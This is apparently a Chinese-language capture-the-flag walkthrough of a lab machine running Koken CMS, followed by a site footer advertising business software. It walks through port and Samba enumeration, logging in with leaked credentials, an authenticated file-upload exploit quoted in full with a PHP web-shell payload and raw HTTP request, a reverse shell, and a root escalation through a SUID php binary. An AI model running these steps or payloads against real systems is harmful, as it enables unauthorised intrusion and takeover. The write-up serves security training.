信息收集

端口掃描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.132

目標(biāo)8000端口為koken cms

使用enum4linux枚舉目標(biāo)samba服務(wù)，發(fā)現(xiàn)共享文件夾

enum4linux -a 192.168.111.132

連接目標(biāo)共享文件夾，發(fā)現(xiàn)兩個(gè)文件

smbclient -N \\\\192.168.111.132\\sambashare

mailsent.txt文件內(nèi)容

使用daisa@photographer.com | babygirl，登錄koken后臺(tái)

同時(shí)該版本的koken cms存在文件上傳漏洞

searchsploit koken

# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)# Date: 2020-07-15# Exploit Author: v1n1v131r4# Vendor Homepage: http://koken.me/# Software Link: https://www.softaculous.com/apps/cms/Koken# Version: 0.22.24# Tested on: Linux# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.mdThe Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.Steps to exploit:1. create a malicious PHP file with this content:   <?php system($_GET['cmd']);?>2. Save as "image.php.jpg"3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.4. On Burp, rename your file to "image.php"POST /koken/api.php?/content HTTP/1.1Host: target.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://target.com/koken/admin/x-koken-auth: cookieContent-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551Content-Length: 1043Connection: closeCookie: PHPSESSID= [Cookie value here]-----------------------------2391361183188899229525551Content-Disposition: form-data; name="name"image.php-----------------------------2391361183188899229525551Content-Disposition: form-data; name="chunk"0-----------------------------2391361183188899229525551Content-Disposition: form-data; name="chunks"1-----------------------------2391361183188899229525551Content-Disposition: form-data; name="upload_session_start"1594831856-----------------------------2391361183188899229525551Content-Disposition: form-data; name="visibility"public-----------------------------2391361183188899229525551Content-Disposition: form-data; name="license"all-----------------------------2391361183188899229525551Content-Disposition: form-data; name="max_download"none-----------------------------2391361183188899229525551Content-Disposition: form-data; name="file"; filename="image.php"Content-Type: image/jpeg<?php system($_GET['cmd']);?>-----------------------------2391361183188899229525551--5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.

漏洞利用

利用burp抓包，修改上傳文件的后綴，jpg改為php即可上傳

訪問(wèn)http://192.168.111.132:8000/storage/originals/cb/43/php-reverse-shell.php獲得反彈shell

提權(quán)

查找suid權(quán)限的文件

find / -perm -u=s 2> /dev/null

提權(quán)方法：https://gtfobins.github.io/gtfobins/php/#suid

提升為root

php -r "pcntl_exec('/bin/sh', ['-p']);"

flag

該文章在 2023/12/13 18:58:44 編輯過(guò)

關(guān)鍵字查詢

web

相關(guān)文章

正在查詢...

點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。

點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理，結(jié)合碼頭的業(yè)務(wù)特點(diǎn)，圍繞調(diào)度、堆場(chǎng)作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體，是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。

點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。

點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi)，不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。